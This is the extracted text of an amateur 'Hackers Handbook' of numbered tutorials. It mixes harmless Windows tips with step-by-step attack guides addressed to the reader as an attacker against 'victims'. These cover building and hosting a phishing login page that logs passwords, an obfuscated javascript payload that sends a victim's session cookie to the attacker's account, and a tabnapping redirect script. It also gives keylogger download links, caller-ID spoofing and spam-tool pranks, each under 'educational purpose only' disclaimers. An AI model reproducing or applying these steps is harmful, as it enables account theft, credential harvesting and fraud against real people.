THE BEST OF SIR WAR10CKS

TUTS
HACKING LIFE TUTORIALS

HACKERS HANDBOOK
PART I

WCS
HACKING THE SYSTEM
HACKERS HANDBOOK BY SIR WAR10CK

1. Chat With Friends using MS-DOS

Step 1:- All you need is your friends IP address and your Command Prompt.

Step 2 :- Open your notepad and write tis code as it is.

@echo off:

Cls

echo MESSENGER

set /p n=User:

set /p m=Message:

net send %n% %m%

Pause

Goto A3.

Step 3 :- Now save this as "Messenger.Bat”.

Step 4 :- Drag this file (.bat file)over to Command Prompt and press enter!

Step 5 :- You would then see some thing like this:

MESSENGER

User:

Step 6 :- After "User” type the IP address of the computer you want to contact.

Step 7 :- Before you press "Enter” it should look like this:

MESSENGER

User: IP_Address User: IP_Address

Message: Hi, How are you ? Message: Hi, How are you?

Step 8 :- Now all you need to do is press "Enter”, and start chatting.

“This Trick Works In the LAN connection Only. And may Not support some latest operating

1
HACKERS HANDBOOK BY SIR WAR10CK

Systems

like Windows 7 and Windows Vista.”

2. How to Change Your IP address

Step 1. Click on "Start" in the bottom left hand corner of screen

Step 2. Click on "Run"

Step 3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.

Step 4. Type "ipconfig /release" just like that, and hit "enter"

Step 5. Type "exit" and leave the prompt

Step 6. Right-click on "Network Places" or "My Network Places" on your desktop.

Step 7. Click on "properties

You should now be on a screen with something titled "Local Area Connection", or

something close to that, and, if you

have a network hooked up, all of your other networks.

Step 8. Right click on "Local Area Connection" and click "properties"

Step 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General"

tab

Step 10. Click on "Use the following IP address" under the "General" tab

Step 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the

area up).

Step 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with

default numbers.

Step 13. Hit the "Ok" button here

Step 14. Hit the "Ok" button again You should now be back to the "Local Area

Connection" screen.

Step 15. Right-click back on "Local Area Connection" and go to properties again.

2
HACKERS HANDBOOK BY SIR WAR10CK

Step 16. Go back to the "TCP/IP" settings

Step 17. This time, select "Obtain an IP address automatically" tongue.gif

Step 18. Hit "Ok"

Step 19. Hit "Ok" again

Step 20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

“This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking

website with this trick be extremely careful, because if they try a little, they can trace it

back.”

3. How To fix corrupted XP files

How to fix corrupted windows file is very easy.Following these following steps

Requirement:

1. Windows XP CD

Now, follow this steps:

Step 1. Place the xp cd in your cd/dvd drive

Step 2. Go to start

Step 3. Run

Step 4. Type sfc /scannow

Now sit back and relax, it should all load and fix all your corrupted file on win XP.Hope this

method can fix your corrupted

xp system files.

“ If this Does Not Work Then You Need to Format The Computer as there would be Viruses

in the

PC and you can can Also Use the antivirus if the Possible otherwise format the PC “.

3
HACKERS HANDBOOK BY SIR WAR10CK

4. Delete an “Undeletable” File /

Folder
You all Are familier With such kinfd of ERROR in windows so how to Fix them.

Step 1:- Open a Command Prompt window and leave it open.

Step 2- Close all open programs.

Step 3:- Click Start, Run and enter TASKMGR.EXE

Step 4:- Go to the Processes tab and End Process on Explorer.exe.

Step 5:- Leave Task Manager open.

Step 6:- Go back to the Command Prompt window and change to the directory the AVI (or

other undeletable file) is

located in.

Step 7:- At the command prompt type DEL <filename> where <filename> is the file you

wish to delete.

Step 8:- Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart

the GUI shell.

Step 9:- Close Task Manager.

Or you can try this

Step 1:- Open Notepad.exe

Step 2:-Click File>Save As..>

Step 3:-locate the folder where ur undeletable file is

Step 4:-Choose 'All files' from the file type box

Step 5:-click once on the file u wanna delete so its name appears in the 'filename' box

Step 6:-put a " at the start and end of the filename

4
HACKERS HANDBOOK BY SIR WAR10CK

(the filename should have the extension of the undeletable file so it will overwrite it)

Step 7:-click save,

Step 8:-It should ask u to overwrite the existing file, choose yes and u can delete it as

normal

Here's a manual way of doing it.

Step 1:- Start

Step 2:- Run

Step 3:- Type: command

Step 4:- To move into a directory type: cd c:\*** (The stars stand for your folder)

Step 5:- If you cannot access the folder because it has spaces for example Program Files or

Kazaa Lite folder you have to

do the following. instead of typing in the full folder name only take the first 6 letters then

put a ~ and then 1 without

spaces. Example: cd c:\progra~1\kazaal~1

Step 6:- Once your in the folder the non-deletable file it in type in dir - a list will come up

with everything inside.

Step 7:- Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name

has spaces you would use the

special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad

file.bmp you would type once in the

specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make

sure to type in the correct

extension.

“ You can use antivirus to remove this error if then also the problem persists then you can

use the

following method “.

5
HACKERS HANDBOOK BY SIR WAR10CK

5. What Is Steganography?
Steganography is the art and science of hiding messages. Steganography is often combined

with cryptography so that

even if the message is discovered it cannot be read.

The word steganography is derived from the Greek words "steganos" and "graphein",

which mean "covered" and

"writing." Steganography, therefore, is covered writing.

Historical stenganography involved techniques such as disappearing ink or microdots.

Modern steganography involves

hiding data in computer files.

It is fairly easy to hide a secret message in a graphic file without obviously altering the

visible appearance of that file.

Steganography software

OutGuess is a universal steganographic tool that allows the insertion of hidden information

into the redundant bits of

data sources. The nature of the data source is irrelevant to the core of OutGuess. The

program relies on data specific

handlers that will extract redundant bits and write them back after modification. In this

version the PNM and JPEG image

formats are supported. In the next paragraphs, images will be used as concrete example of

data objects, though OutGuess

can use any kind of data, as long as a handler is provided.

F5 is a publicly available steganography software package which hides messages in BMP,

GIF , and JPG graphics.

Camera/Shy is the only steganographic tool that automatically scans for and delivers

6
HACKERS HANDBOOK BY SIR WAR10CK

decrypted content straight from the

Web. It is a stand-alone, Internet Explorer-based browser that leaves no trace on the user's

system and has enhanced

security.

JPHIDE and JPSEEK are programs which allow you to hide a file in a jpeg visual image.

There are lots of versions of similar

programs available on the internet but JPHIDE and JPSEEK are rather special. The design

objective was not simply to hide

a file but rather to do this in such a way that it is impossible to prove that the host file

contains a hidden file. Given a

typical visual image, a low insertion rate (under 5%) and the absence of the original file, it

is not possible to conclude with

any worthwhile certainty that the host file contains inserted data. As the insertion

percentage increases the statistical

nature of the jpeg coefficients differs from "normal" to the extent that it raises suspicion.

Above 15% the effects begin to

become visible to the naked eye. Of course some images are much better than others

when used a host file - plenty of

fine detail is good. A cloudless blue sky over a snow covered ski paradise is bad. A waterfall

in a forest is probably ideal.

MP3Stego will hide information in MP3 files during the compression process. The data is

first compressed, encrypted and

then hidden in the MP3 bit stream. Although MP3Stego has been written with

steganographic applications in mind it

might be used as a copyright marking system for MP3 files (weak but still much better than

the MPEG copyright flag defined by the standard). Any opponent can uncompress the bit

7
HACKERS HANDBOOK BY SIR WAR10CK

stream and recompress it; this

will delete the hidden information (actually this is the only attack we know yet) but at the

expense of severe quality loss.

Steghide is a steganography program that is able to hide data in JPG, BMP, WAV, and AU

files. The color frequencies are

not changed thus making the embedding resistant against first-order statistical tests.

Hydan steganographically conceals a message ito an executable. It exploits redundancy in

the i386 instruction set by

defining sets of functionally equivalent instructions. It then encodes information in

machine code by using the

appropriate instructions from each set. The executable filesize remains unchanged. The

message is Blowfish encrypted

with a user-supplied passphrase before being embedded.

The 1st method that We will Study Here Is Using command Prompt.

To hide a file behind a image.

To hide a file behind a image file which means that if any one opens that image he will see

the image only but if you open

in a special way then you can open the hidden file behind the image.

So to hide the file behind a image open CMD.exe

1) Select an image to be used for hiding file behind the image.

2) Now select a file to hide behind the image and make it in .RAR format. With the help of

the WinRAR.

3) And most important is that paste both the files on desktop and run the following

command on the command

prompt.

8
HACKERS HANDBOOK BY SIR WAR10CK

4) And then type the following command. { cd } { Copy /b imagename.jpg + filename.rar

finalnameofimage.jpg }

And then hit enter the file will be created with the file final file name of the image.

“ Using This method for The illegal Activities is against the Laws this tutorial is for

educational

purpose only “.

“ You Can Also Use The softwares for the steganography like STEGHIDE Or F5 which will

make your

work easy and time efficient “.

6. What Is MD5 Hash & How to Use It

?
In this post I will explain you about an interesting cryptographic algorithm called MD5

(Message-Digest algorithm 5). This

algorithm is mainly used to perform file integrity checks under most circumstances. Here I

will not jump into the technical

aspects of this algorithm, rather will tell you about how to make use of this algorithm in

your daily life. Before I tell you

about how to use MD5, I would like to share one of my recent experience which made me

start using MD5 algorithm.

Recently I made some significant changes and updates to my website and as obvious I

generated a complete backup

of the site on my server. I downloaded this backup onto my PC and deleted the original one

on the server. But after a few

days something went wrong and I wanted to restore the backup that I downloaded. When I

9
HACKERS HANDBOOK BY SIR WAR10CK

tried to restore the backup I

was shocked! The backup file that I used to restore was corrupted. That means, the backup

file that I downloaded onto

my PC wasn’t exactly the one that was on my server. The reason is that there occured

some data loss during the

download process. Yes, this data loss can happen often when a file is downloaded from the

Internet. The file can be

corrupted due to any of the following reasons.

Data loss during the download process, due to instability in the Internet

connection/server

The file can be tampered due to virus infections or,

Due to Hacker attacks

So whenever you download any valuable data from the Internet it is completely necessary

that you check the integrity of

the downloaded file. That is you need to ensure that the downloaded file is exactly the

same as that of the original one. In

this scenario the MD5 hash can become handy. All you have to do is generate MD5 hash

(or MD5 check-sum) for the

intended file on your server. After you download the file onto your PC, again generate MD5

hash for the downloaded file.

Compare these two hashes and if it matches then it means that the file is downloaded

perfectly without any data loss.

A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as

follows

A simple MD5 Hash

e4d909c290d0fb1ca068ffaddf22cbd0

10
HACKERS HANDBOOK BY SIR WAR10CK

This hash is unique for every file irrespective of it’s size and type. That means two .exe files

with the same size will not

have the same MD5 hash even though they are of same type and size. So MD5 hash can be

used to uniquely identify a

file.

How to use MD5 Hash to check the Integrity of Files?

Suppose you have a file called backup.tar on your server. Before you download, you need

to generate MD5 hash for this

file on your server. To do so use the following command.

For UNIX:

md5sum backup.tar

When you hit ENTER you’ll see something as follows

e4d909c290d0fb1ca068ffaddf22cbd0

This is the MD5 hash for the file backup.tar. After you download this file onto your PC, you

can cross check it’s integrity by

again re-generating MD5 hash for the downloaded file. If both the hash matches then it

means that the file is perfect.

Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded

file on your Windows PC use

the following freeware tool.

“You can Download MD5 Summer From Here:

http://www.md5summer.org/download.html “.

7. What Is Phishing ?
The act of sending an Email to a user falsely claiming to be an established legitimate

enterprise in an attempt to scam the

11
HACKERS HANDBOOK BY SIR WAR10CK

user into surrendering private information that will be used for identity theft.

The Email directs the user to visit a Web site where they are asked to update personal

information, such as passwords

and credit card, social security, and bank account numbers, that the legitimate

organization already has. The Web site,

however, is Bogus and set up only to steal the User’s information.

Phishing attacks are Trying to steal your Money !!!

Phishing Scams Could Be-

Emails inviting you to join a Social Group, asking you to Login using your Username and

Password.

Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.

Emails containing some Information of your Interest and asking you to Login to Your

Account.

Any Email carrying a Link to Click and asking you to Login.

The Phishing Hack Starts Now. this Hack example is for orkut account.

Step 1:- Download the necessary files Which you will need during the phishing attack. This

file is a .rar file which

includes 3 files named hackingtech.php, hackingtech.txt & ServiceLogin.html and also

consist a folder in which

there are support files for ServerLogin.html

Step 2:- Unrar the download pack named orkuthacking.rar any where on your computer.

Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and

"hackingtech.txt" in any

web hosting site..

You will have to create a sub-folder in the web hosting site's directory. Name that folder as

"ServiceLogin_files" and

12
HACKERS HANDBOOK BY SIR WAR10CK

upload the 2 images of the pack in that folder. (it must support PHPs.)

>>> You can choose one of the following web hosting Company to upload the Folder.

http://www.freeweb7.com

http://Ripway.com{Recommended}

http://www.110mb.com

http://www.phpnet.us

http://www.byethost.com

http://www.t35.com

http://www.awardspace.com

http://www.free-webhosts.com/free-php-webhosting.php

http://www.freehostia.com

http://www.dajoob.com

http://ifastnet.com

http://007ihost.com

http://www.247mb.com/register.jsp

http://www.10gbfreehost.com/

Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever

he/she will type the password

and sign in . Password will be stored in "hackingtech.txt"...

General form of the fake page's link

Code:

http://urwebhostingsite/urusername/ServiceLogin.htm

Step 5:- Now you can send this link to victim by any mode but the best is my email send a

fake email in the name of orkut

the your orkut account has a security problem pl. click on th link below and re-activate

your account. we will see how to

13
HACKERS HANDBOOK BY SIR WAR10CK

send fake email within short time.

Now If You want to create your own phishing page the follow the steps below.

Step 1:-Open the website whose phishing page you want create.

Step 2:-Then right click any where on the page and select view source.

Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the

code.

Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm

Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press

ctrl+f to find the word]

Step 6:-You will find like this action="

https://www.google.com/accounts/ServiceLoginAuth "

Step 7:-Replace the link between this red quote with the link you got by uploading the file

hackingtech.php and it should

be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "

Step 8:-Now Save this as serverlogin.htm

Step 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php"

and "hackingtech.txt" and

serverlogin.htm file in any web hosting site you want.

Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting

company .

Step 11:- Now you can send this link to victim by any mode but the best is my email send a

fake email in the name of

orkut the your orkut account has a security problem pl. click on th link below and re-

activate your account. we will see

how to send fake email within short time.

14
HACKERS HANDBOOK BY SIR WAR10CK

Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt

given by your hosting company .

Prevention Against Phishing :-

Read all the Email Carefully and Check if the Sender is Original.

Watch the Link Carefully before Clicking

Always check the URL in the Browser before Signing IN to your Account

Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in

any other Website or Email.

“Do not use this hack trick in any criminal activities like phishing bank websites and please

do not

destroy any ones account this is only for educational purpose”.

8. How To View Hidden Password

behind ****
Step 1.First of all open up the webpage on which you wanna show the hidden passwords.

Step 2. Then in the username there must be the name and in the password there must be

********

Step 3.Now to see the password which is behind the ******** Just copy and paste the

following JavaScript into the

address bar of the browser and you are done.

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;

%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)

%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)

%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)

%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if

15
HACKERS HANDBOOK BY SIR WAR10CK

%20(s)%20alert(%22Passwords%20in%20forms%20on%20this

%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are

%20no%20passwords%20in%20forms%20on%20this

%20page.%22);})();

Step 4. After copying and pasting the JavaScript given above press the enter key and

hidden passwords will be shown to

you.

“You can use This script when some one has checked the remember me button in the login

form

of any website and to reveal password from that saved astrisk or encrypted password”.

“Do not use this hack trick in any criminal activities and please do not destroy any ones

account

this is for educational purpose only”.

9. Hack Orkut Accounts by Cookie

Stealing
This article below explains the method to hack orkut account by stealing orkut account

cookies. Hacking orkut accounts

has become much popular and hence i have added this article which will help you in

hacking your friend’s orkut account.

Just ask the victim to copy the script in address bar and then you will be able to

login/access /hack his orkut account.

Note: My purpose is only to make u aware of what’s happening around and not to teach u

hacking orkut account, Gmail

or any account in any sort!!.

16
HACKERS HANDBOOK BY SIR WAR10CK

Procedure for hacking orkut account by stealing orkut cookies from Mozilla Firefox to hack

Gmail or orkut is given below.

"Hacking orkut account or Gmail” by "stealing orkut account cookies”:

The post explains how one can steal cookies to hack orkut account or Gmail account. No

password cracking method

required.

Steps to hack Gmail or orkut account password by stealing orkut cookies:-

Step 1. Firstly you need have Mozilla firefox.

Step2. Cookie editor“Download cookie editor plugin for Mozilla firefox from:

https://addons.mozilla.org/en-US/firefox/addon/573 plugin for Mozilla firefox.

Step 3. You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you

have to receive orkut cookies to

one Orkut account and other Orkut account for Advertising your Script, Well it depends on

your Choice to have Two

Gmail(Orkut) accounts.

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;

nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?

Action.submit’;nobody.submit()

How to use orkut cookies script?

Step 1. Replace your number "UserId.value=33444211″

How to Replace your Number

Step 1. Go to your Orkut album

Step 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.

Step 3. Now replace your value with the value in the java script.

17
HACKERS HANDBOOK BY SIR WAR10CK

Your script will look like -

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;

nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,9

9,111,111,107,105,101));

nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()

Step 2. Now send this Cookie script to the victim and ask him to paste in Address bar and

Press enter.

Step 3. You’ll get his orkut account cookie in your scrap book.

Step 4. After getting a orkut account cookie go to your orkut Home page , Then click on

Tools tab and then go to cookie

editor plugin( Tools–> Cookie editor)

Step 5. click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the

orkut_state part with your

victim’s Script

put ur eight digit number in the place of (33444211).

Thats it your done with.

Logout of your orkut and login again and you’ll be in your victims Homepage.

Step 6. So remember guys…if you are having orkut account or having any other

account….never use any suspicious script

to prevent anyone from hacking/accessing your orkut account.

I hope you have learned how to hack orkut accounts using cookie stealing. Just the script

can be used to hack orkut

accounts and then access victim’s orkut account. Enjoy hacking orkut.

“Do not use this hack trick in any criminal activities and please do not destroy any ones

account

this is for educational purpose only”.

18
HACKERS HANDBOOK BY SIR WAR10CK

“You can also use this attack for many other sites like yahoo but you will need some other

scripts

for that but nothing is impossible so use Google and search the script for other sites for

self-practice”.

10. Tab Napping A New Phishing

Attack
Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious

e-mails (or, for the really

paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious

way to launch an attack by

hijacking your unattended browser tabs.

The attack works by first detecting that the tab the page is in does not have focus. Then the

attacking script can change

the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in

the background.

Even scarier, the attack can parse through your history to find sites you actually visit and

impersonate them.

Because most of us trust our tabs to remain on the page we left them on, this is a

particularly difficult attack to detect. As

Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong

visual cue — memory is

mailable and moldable and the user will most likely simply think they left *the+ tab open.”

The only clue that you’re being tricked is that the URL will be wrong.

The Script Used is as Below.-

19
HACKERS HANDBOOK BY SIR WAR10CK

<a> open this in a tab of your browser and wait for 10 seconds and see after you come

back but leave this page and go

to other tab to see this magic.</a>

<script type="text/javascript">

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect(){

if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;

clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling

timerRedirect =

setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);

//set timed

redirect

else if (typeof window.pageYOffset != "undefined"){ //other browsers that support

pageYOffset/pageXOffset instead

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;

clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling

timerRedirect =

setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);

20
HACKERS HANDBOOK BY SIR WAR10CK

//set timed

redirect

//else do nothing

function pollActivity(){

if ((typeof document.body.scrollTop != "undefined" &&

(xScroll!=document.body.scrollLeft ||

yScroll!=document.body.scrollTop)) //IE/NS7/Moz

||

(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset ||

yScroll!=window.pageYOffset))) {

//other browsers

initRedirect(); //reset polling scroll position

} document.onmousemove=initRedirect;

document.onclick=initRedirect;

document.onkeydown=initRedirect;

window.onload=initRedirect;

window.onresize=initRedirect;

</script>

Replace the URL highlighted here with your URL where you want the victim to redirect.

Use This Script in the Page and then the page will redirect after 10 sec when the user if not

on the particular tab.

“Do not use this hack trick in any criminal activities and please do not destroy any ones

21
HACKERS HANDBOOK BY SIR WAR10CK

account

this is for educational purpose only”.

11. How to Check The email is original

or Not
First of all let us see How email system is working over internet.

The email is sent on internet as shown in below picture

So Here The Sender i.e [email protected] is sending a mail to [email protected]. so the

sender will type the mail and click on

send button and the mail will go to SERVER1.com whereSERVER1.com will forward the mail

over internet and the internet

will search the [email protected] email ids server and send it to SERVER2.in and the the

SERVER2.in will search for

the [email protected] in their own database and then the mail will be forwarded to

[email protected] and when the XYZ user

login to their account they will see an email in their inbox which is from [email protected].

Now How To send the fake mail

To send fake mail We need to Bypass the [email protected] and SERVER1.com both and

directly send an email over

internet .

So for that we will use a .php script as php has a function mail(); which can send email to

any one without the

SERVER1.com and directly delivering the mail to SERVER2.in and then SERVER2.in will

search for the [email protected] in

their own database and then the mail will be forwarded to [email protected] and when the

22
HACKERS HANDBOOK BY SIR WAR10CK

XYZ user login to their account

they will see an email in their inbox which is from [email protected].

12. Hack facebook account by

facebook hacker
Hack facebook Account With facebook Hacker.

Facebook is one of the most attractive keywords of Computer Hacking and so, large

number of Facebook users are visiting

Computer Hacking. .

Well, Facebook Hacker is a multi-functional software used to hack facebook account.

Actually, you can't hack facebook

password, but yes, cause many nuisance and pranks by using this Facebook Hacker

software.

Hack Facebook Accounts with Facebook Hacker

Step 1. First of all Download Facebook Hacker software.

Step 2. Now, run Facebook Hacker.exe file to see:

Login to your Facebook account and then hit on OK at right bottom.

Step 3. Now, Facebook Hacker options are displayed Step 4. In Victim pane at left bottom,

enter the facebook ID of the victim you wanna hack in User ID field.

Step 5. Now, using this Facebook Hacker software you can:

Flood wall of victim.

Spam his message box.

Comment on him like crazy.

Poke him and even add mass likes.

23
HACKERS HANDBOOK BY SIR WAR10CK

Thus, you can play such pranks with your friends using this Facebook Hacker. So, free

download Facebook

Hacker and trick out your friends.

That's all. Hope you will enjoy using this tool. I have tried this Facebook hacker software

and found working

perfect for me.

“Do not use this hack trick in any criminal activities and please do not destroy any ones

account

this is for educational purpose only”.

13. What Are Key loggers?

Keyloggers definition

Keylogger is a software program or hardware device that is used to monitor and log each

of the keys a user types into a

computer keyboard. The user who installed the program or hardware device can then view

all keys typed in by that user.

Because these programs and hardware devices monitor the keys typed in a user can easily

find user passwords and other

information a user may not wish others to know about.

Keyloggers, as a surveillance tool, are often used by employers to ensure employees use

work computers for business

purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your

information to be transmitted

to an unknown third party.

About keyloggers

A keylogger is a program that runs in the background, recording all the keystrokes. Once

24
HACKERS HANDBOOK BY SIR WAR10CK

keystrokes are logged, they are

hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then

peruses them carefully in the

hopes of either finding passwords, or possibly other useful information that could be used

to compromise the system or

be used in a social engineering attack. For example, a keylogger will reveal the contents of

all e-mail composed by the

user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which

loads the DLL and sets the

hook. Therefore when you deploy the hooker on a system, two such files must be present

in the same directory.

There are other approaches to capturing info about what you are doing.

Somekeyloggerscapture screens, rather than keystrokes.

Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what they

capture over your internet

connection.

A keyloggers might be as simple as an exe and a dll that are placed on a machine and

invoked at boot via an entry in the

registry. Or a keyloggers could be which boasts these features:

Stealth: invisible in process list

Includes kernel keylogger driver that captures keystrokes even when user is logged off

(Windows 2000 / XP)

ProBot program files and registry entries are hidden (Windows 2000 / XP)

Includes Remote Deployment wizard

Active window titles and process names logging

25
HACKERS HANDBOOK BY SIR WAR10CK

Keystroke / password logging

Regional keyboard support

Keylogging in NT console windows

Launched applications list

Text snapshots of active applications.

Visited Internet URL logger

Capture HTTP POST data (including logins/passwords)

File and Folder creation/removal logging

Mouse activities

Workstation user and timestamp recording

Log file archiving, separate log files for each user

Log file secure encryption

Password authentication

Invisible operation

Native GUI session log presentation

Easy log file reports with Instant Viewer 2 Web interface

HTML and Text log file export

Automatic E-mail log file delivery

Easy setup & uninstall wizards

Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP

Because a keylogger can involve dozens of files, and has as a primary goal complete stealth

from the user, removing one

manually can be a terrifying challenge to any computer user. Incorrect removal efforts can

result in damage to the

operating system, instability, inability to use the mouse or keyboard, or worse. Further,

some key loggers will survive

26
HACKERS HANDBOOK BY SIR WAR10CK

manual efforts to remove them, re-installing themselves before the user even reboots.

Some Famous Key Loggers.

1. Actual spy.

2. Golden Keylogger

3. Remote Keylogger.

4. Home Keylogger

5. Soft Central keylogger

6. Stealth keyboard

“You can Download Actual spy From Here: http://u.to/tCWk “.

“You can Download Golden Keylogger From Here: http://u.to/0iWk “.

“You can Download Remote Keylogger From Here: http://u.to/3iWk “.

“You can Download Home Keylogger From Here: http://u.to/CSak “.

“You can Download Soft Central From Here: http://u.to/OCak “.

“You can Download Adramax keylogger From Here: http://u.to/Pyak “.

14. How To remove New Folder virus

What is Newfolder.exe?

The real name of this virus is Iddono. This threat copies its file(s) to your hard disk. Its

typical file name is Iddono. Then it

creates new startup key with name Iddono and value newfolder.exe. You can also find it in

your processes list with name

newfolder.exe or Iddono. This virus is very difficult to eliminate manually, but you can find

several possible methods of

removal below.

How to fix Newfolder.exe?

Quick Solution:

27
HACKERS HANDBOOK BY SIR WAR10CK

True Sword will find and eliminate this problem and more than 447 908 other dangerous

threats including trojans,

spyware, adware, riskware, problemware, keyloggers, dialers and other kinds of malicious

programs in several seconds.

Fast, easy, and handy, True Sword protects your computer against malicious programs that

do harm to your computer

and break your privacy. True Sword scans your hard disks and registry and destroys any

manifestation of such malicious

programs. Standard anti-virus software can do nothing against privacy breakers and

malicious programs like that. Get rid

of trojans, spyware, adware, trackware, dialers and keyloggers in one click .

How to fix Newfolder.exe manually? For advanced users only

This problem can be solved manually by deleting all registry keys and files connected with

this software, removing it from

starup list and unregistering all corresponding DLLs. Additionally missing DLL's should be

restored from distribution in

case they are corrupted by Iddono. To fix this threat, you should: 1. Kill the following

processes and delete the

appropriate files:

libedit.dll

newfolder.exe

shelliddono.dll

srv0104.ids

srvidd20.exe

If these files can't be deleted during normal Windows work or recreate themselves, reboot

into Safe Mode and repeat

28
HACKERS HANDBOOK BY SIR WAR10CK

deletion. If you do not see all of these files, then they are hiding themselves. You need

special software to kill those

hidden files. 2. Delete the following malicious registry entries and\or values:

Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run for nwiz.exe Value: @

Key: software\microsoft\windows\currentversion\run\alchem Value: @

Key: software\microsoft\windows\currentversion\run\zzb Value: @

Another method which is recently discovered by me that any AVG antivirus above

8.0version can detect the new folder

virus easily.

“For beginners I recommend to for for the Software True Sword its free “.

15. Call Your Friend from Their Own

Number
Step 1:- Go to http://www.mobivox.com and register there for free account.

Step 2:- During registration, remember to insert your friends (Victims) mobile number in

"Phone number" field

Step 3:- Complete registration and confirm your email id and then login to your account.

Step 4:- Click on "Direct WebCall" After successful Login into your Mobivox account.

Step 5:- You will arrive at page shown below. In "Enter a number" box, select your country

and also any mobile

number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with

his own number.

Step 6:- That's it. Your friend will be shocked to see his own number calling him.

[1] .You get only 10 min to call free after that you need to pay money , but you can make

another account with another friends number and another email id and start pranking

29
HACKERS HANDBOOK BY SIR WAR10CK

again...

[2] .But don't miss use this hack by calling someone's GIRL Friend(s) OR BOY Friend(s).

Because

this hack is untraceable. If You call Customer Care and tell about this then they will tell this

thing

cannot happen.

NEW MYSQL ZERO DAYS — HACKING WE

30
HACKERS HANDBOOK BY SIR WAR10CK

Two critical zero-day vulnerabilities have been discovered in the world's 2nd most
popular database management software MySQL that could allow an attacker to take

full control over the database.

Polish security researcher Dawid Golunski has discovered two zero-days, CVE-

2016-6662 and CVE-2016-6663, that affect all currently supported MySQL versions

as well as its forked such as MariaDB and PerconaDB.

Golunski further went on to publish details and a proof-of-concept exploit code

for CVE-2016-6662 after informing Oracle of both issues, along with vendors of

MariaDB and PerconaDB.

Both MariaDB and PerconaDB had fixed the vulnerabilities, but Oracle had not.

The vulnerability (CVE-2016-6662) can be exploited by hackers to inject malicious

settings into MySQL configuration files or create their own malicious ones.

EXPLOITATION VECTOR
The above flaw could be exploited either via SQL Injection or by hackers with

authenticated access to MySQL database (via a network connection or web

interfaces like phpMyAdmin).

"A successful exploitation [of CVE-2016-6662] could allow attackers to execute
arbitrary code with root privileges which would then allow them to fully compromise

31
HACKERS HANDBOOK BY SIR WAR10CK

the server on which an affected version of MySQL is running," Golunski explained in

an advisory published today.

